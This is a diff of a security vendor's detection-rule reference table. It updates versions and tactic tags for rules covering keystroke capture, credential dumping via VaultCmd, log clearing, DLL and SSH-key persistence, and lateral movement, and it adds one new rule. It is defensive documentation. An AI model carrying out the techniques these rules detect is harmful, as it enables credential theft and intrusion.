|Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |110 |<<powershell-mailbox-collection-script, PowerShell Mailbox Collection Script>> |Detects PowerShell scripts that can be used to collect data from mailboxes. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |8.3.0 |5 @@ -1284,7 +1334,7 @@ and their rule type is `machine_learning`. |<<powershell-psreflect-script, PowerShell PSReflect Script>> |Detects the use of PSReflect in PowerShell scripts. Attackers leverage PSReflect as a library that enables PowerShell to access win32 API functions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 -|<<powershell-script-block-logging-disabled, PowerShell Script Block Logging Disabled>> |Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<powershell-script-block-logging-disabled, PowerShell Script Block Logging Disabled>> |Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<powershell-script-with-archive-compression-capabilities, PowerShell Script with Archive Compression Capabilities>> |Identifies the use of Cmdlets and methods related to archive compression activities. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |3 @@ -1294,21 +1344,21 @@ and their rule type is `machine_learning`. |<<powershell-script-with-log-clear-capabilities, PowerShell Script with Log Clear Capabilities>> |Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |2 -|<<powershell-script-with-password-policy-discovery-capabilities, PowerShell Script with Password Policy Discovery Capabilities>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |1 +|<<powershell-script-with-password-policy-discovery-capabilities, PowerShell Script with Password Policy Discovery Capabilities>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Execution], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |2 -|<<powershell-script-with-remote-execution-capabilities-via-winrm, PowerShell Script with Remote Execution Capabilities via WinRM>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |2 +|<<powershell-script-with-remote-execution-capabilities-via-winrm, PowerShell Script with Remote Execution Capabilities via WinRM>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Execution], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |3 |<<powershell-script-with-token-impersonation-capabilities, PowerShell Script with Token Impersonation Capabilities>> |Detects scripts that contain PowerShell functions, structures, or Windows API functions related to token impersonation/theft. Attackers may duplicate then impersonate another user's token to escalate privileges and bypass access controls. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: PowerShell Logs] |8.3.0 |8 |<<powershell-script-with-webcam-video-capture-capabilities, PowerShell Script with Webcam Video Capture Capabilities>> |Detects PowerShell scripts that can be used to record webcam video. Attackers can capture this information to extort or spy on victims. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |1 -|<<powershell-share-enumeration-script, PowerShell Share Enumeration Script>> |Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |6 +|<<powershell-share-enumeration-script, PowerShell Share Enumeration Script>> |Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |7 -|<<powershell-suspicious-discovery-related-windows-api-functions, PowerShell Suspicious Discovery Related Windows API Functions>> |This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 +|<<powershell-suspicious-discovery-related-windows-api-functions, PowerShell Suspicious Discovery Related Windows API Functions>> |This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |110 |<<powershell-suspicious-payload-encoded-and-compressed, PowerShell Suspicious Payload Encoded and Compressed>> |Identifies the use of .NET functionality for decompression and base64 decoding combined in PowerShell scripts, which malware and security tools heavily use to deobfuscate payloads and load them directly in memory to bypass defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 -|<<powershell-suspicious-script-with-audio-capture-capabilities, PowerShell Suspicious Script with Audio Capture Capabilities>> |Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |107 +|<<powershell-suspicious-script-with-audio-capture-capabilities, PowerShell Suspicious Script with Audio Capture Capabilities>> |Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 |<<powershell-suspicious-script-with-clipboard-retrieval-capabilities, PowerShell Suspicious Script with Clipboard Retrieval Capabilities>> |Detects PowerShell scripts that can get the contents of the clipboard, which attackers can abuse to retrieve sensitive information like credentials, messages, etc. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |8.3.0 |6 @@ -1342,11 +1392,11 @@ and their rule type is `machine_learning`. |<<process-injection-prevented-elastic-endgame, Process Injection - Prevented - Elastic Endgame>> |Elastic Endgame prevented Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |101 -|<<process-injection-by-the-microsoft-build-engine, Process Injection by the Microsoft Build Engine>> |An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Sysmon Only] |8.3.0 |104 +|<<process-injection-by-the-microsoft-build-engine, Process Injection by the Microsoft Build Engine>> |An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Sysmon Only] |8.3.0 |105 -|<<process-started-from-process-id-pid-file, Process Started from Process ID (PID) File>> |Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<process-started-from-process-id-pid-file, Process Started from Process ID (PID) File>> |Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<process-termination-followed-by-deletion, Process Termination followed by Deletion>> |Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<process-termination-followed-by-deletion, Process Termination followed by Deletion>> |Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<processes-with-trailing-spaces, Processes with Trailing Spaces>> |Identify instances where adversaries include trailing space characters to mimic regular files, disguising their activity to evade default file handling mechanisms. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 @@ -1356,7 +1406,7 @@ and their rule type is `machine_learning`. |<<proxychains-activity, ProxyChains Activity>> |This rule monitors for the execution of the ProxyChains utility. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<psexec-network-connection, PsExec Network Connection>> |Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<psexec-network-connection, PsExec Network Connection>> |Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<python-script-execution-via-command-line, Python Script Execution via Command Line>> |Identifies when a Python script is executed using command line input and imports the sys module. Attackers often use this method to execute malicious scripts and avoiding writing it to disk. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |None |1 @@ -1364,7 +1414,7 @@ and their rule type is `machine_learning`. |<<rdp-remote-desktop-protocol-from-the-internet, RDP (Remote Desktop Protocol) from the Internet>> |This rule detects network events that may indicate the use of RDP traffic from the Internet. RDP is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |103 -|<<rdp-enabled-via-registry, RDP Enabled via Registry>> |Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<rdp-enabled-via-registry, RDP Enabled via Registry>> |Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<rpc-remote-procedure-call-from-the-internet, RPC (Remote Procedure Call) from the Internet>> |This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |103 @@ -1374,19 +1424,19 @@ and their rule type is `machine_learning`. |<<ransomware-prevented-elastic-endgame, Ransomware - Prevented - Elastic Endgame>> |Elastic Endgame prevented ransomware. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame] |8.3.0 |101 -|<<rare-aws-error-code, Rare AWS Error Code>> |A machine learning job detected an unusual error in a CloudTrail message. These can be byproducts of attempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<rare-aws-error-code, Rare AWS Error Code>> |A machine learning job detected an unusual error in a CloudTrail message. These can be byproducts of attempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 |<<rare-user-logon, Rare User Logon>> |A machine learning job found an unusual user name in the authentication logs. An unusual user name is one way of detecting credentialed access by means of a new or dormant user account. An inactive user account (because the user has left the organization) that becomes active may be due to credentialed access using a compromised account password. Threat actors will sometimes also create new users as a means of persisting in a compromised web application. |[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access], [Resources: Investigation Guide] |8.3.0 |104 -|<<registry-persistence-via-appcert-dll, Registry Persistence via AppCert DLL>> |Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<registry-persistence-via-appcert-dll, Registry Persistence via AppCert DLL>> |Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<registry-persistence-via-appinit-dll, Registry Persistence via AppInit DLL>> |AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<registry-persistence-via-appinit-dll, Registry Persistence via AppInit DLL>> |AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<remote-computer-account-dnshostname-update, Remote Computer Account DnsHostName Update>> |Identifies the remote update to a computer account's DnsHostName attribute. If the new value set is a valid domain controller DNS hostname and the subject computer name is not a domain controller, then it's highly likely a preparation step to exploit CVE-2022-26923 in an attempt to elevate privileges from a standard domain user to domain admin privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Use Case: Vulnerability] |8.3.0 |107 |<<remote-desktop-enabled-in-windows-firewall-by-netsh, Remote Desktop Enabled in Windows Firewall by Netsh>> |Identifies use of the network shell utility (netsh.exe) to enable inbound Remote Desktop Protocol (RDP) connections in the Windows Firewall. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<remote-execution-via-file-shares, Remote Execution via File Shares>> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<remote-execution-via-file-shares, Remote Execution via File Shares>> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<remote-file-copy-to-a-hidden-share, Remote File Copy to a Hidden Share>> |Identifies a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 @@ -1400,7 +1450,7 @@ and their rule type is `machine_learning`. |<<remote-file-download-via-powershell, Remote File Download via PowerShell>> |Identifies powershell.exe being used to download an executable file from an untrusted remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<remote-file-download-via-script-interpreter, Remote File Download via Script Interpreter>> |Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<remote-file-download-via-script-interpreter, Remote File Download via Script Interpreter>> |Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<remote-logon-followed-by-scheduled-task-creation, Remote Logon followed by Scheduled Task Creation>> |Identifies a remote logon followed by a scheduled task creation on the target host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement] |8.3.0 |6 @@ -1412,6 +1462,8 @@ and their rule type is `machine_learning`. |<<remote-windows-service-installed, Remote Windows Service Installed>> |Identifies a network logon followed by Windows service creation with same LogonId. This could be indicative of lateral movement, but will be noisy if commonly done by administrators." |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence] |8.3.0 |6 +|<<remote-xsl-script-execution-via-com, Remote XSL Script Execution via COM>> |Identifies the execution of a hosted XSL script using the Microsoft.XMLDOM COM interface via Microsoft Office processes. This behavior may indicate adversarial activity to execute malicious JScript or VBScript on the system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + |<<remotely-started-services-via-rpc, Remotely Started Services via RPC>> |Identifies remote execution of Windows services over remote procedure call (RPC). This could be indicative of lateral movement, but will be noisy if commonly done by administrators." |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<renamed-autoit-scripts-interpreter, Renamed AutoIt Scripts Interpreter>> |Identifies a suspicious AutoIt process execution. Malware written as an AutoIt script tends to rename the AutoIt executable to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 @@ -1426,7 +1478,7 @@ and their rule type is `machine_learning`. |<<smtp-on-port-26-tcp, SMTP on Port 26/TCP>> |This rule detects events that may indicate use of SMTP on TCP port 26. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |103 -|<<ssh-authorized-keys-file-modification, SSH Authorized Keys File Modification>> |The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 +|<<ssh-authorized-keys-file-modification, SSH Authorized Keys File Modification>> |The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence], [Data Source: Elastic Defend] |8.6.0 |204 |<<ssh-authorized-keys-file-modified-inside-a-container, SSH Authorized Keys File Modified Inside a Container>> |This rule detects the creation or modification of an authorized_keys or sshd_config file inside a container. The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). Unexpected and unauthorized SSH usage inside a container can be an indicator of compromise and should be investigated. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Lateral Movement] |8.8.0 |2 @@ -1434,15 +1486,15 @@ and their rule type is `machine_learning`. |<<ssh-process-launched-from-inside-a-container, SSH Process Launched From Inside A Container>> |This rule detects an SSH or SSHD process executed from inside a container. This includes both the client ssh binary and server ssh daemon process. SSH usage inside a container should be avoided and monitored closely when necessary. With valid credentials an attacker may move laterally to other containers or to the underlying host through container breakout. They may also use valid SSH credentials as a persistence mechanism. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence] |8.8.0 |2 -|<<suid-sguid-enumeration-detected, SUID/SGUID Enumeration Detected>> |This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suid-sguid-enumeration-detected, SUID/SGUID Enumeration Detected>> |This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |3 |<<sunburst-command-and-control-activity, SUNBURST Command and Control Activity>> |The malware known as SUNBURST targets the SolarWind's Orion business software for command and control. This rule detects post-exploitation command and control activity of the SUNBURST backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<scheduled-task-created-by-a-windows-script, Scheduled Task Created by a Windows Script>> |A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<scheduled-task-created-by-a-windows-script, Scheduled Task Created by a Windows Script>> |A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<scheduled-task-execution-at-scale-via-gpo, Scheduled Task Execution at Scale via GPO>> |Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 +|<<scheduled-task-execution-at-scale-via-gpo, Scheduled Task Execution at Scale via GPO>> |Detects the modification of Group Policy Object attributes to execute a scheduled task in the objects controlled by the GPO. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |108 -|<<scheduled-tasks-at-command-enabled, Scheduled Tasks AT Command Enabled>> |Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<scheduled-tasks-at-command-enabled, Scheduled Tasks AT Command Enabled>> |Identifies attempts to enable the Windows scheduled tasks AT command via the registry. Attackers may use this method to move laterally or persist locally. The AT command has been deprecated since Windows 8 and Windows Server 2012, but still exists for backwards compatibility. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<screensaver-plist-file-modified-by-unexpected-process, Screensaver Plist File Modified by Unexpected Process>> |Identifies when a screensaver plist file is modified by an unexpected process. An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 @@ -1450,21 +1502,21 @@ and their rule type is `machine_learning`. |<<searching-for-saved-credentials-via-vaultcmd, Searching for Saved Credentials via VaultCmd>> |Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<security-software-discovery-using-wmic, Security Software Discovery using WMIC>> |Identifies the use of Windows Management Instrumentation Command (WMIC) to discover certain System Security Settings such as 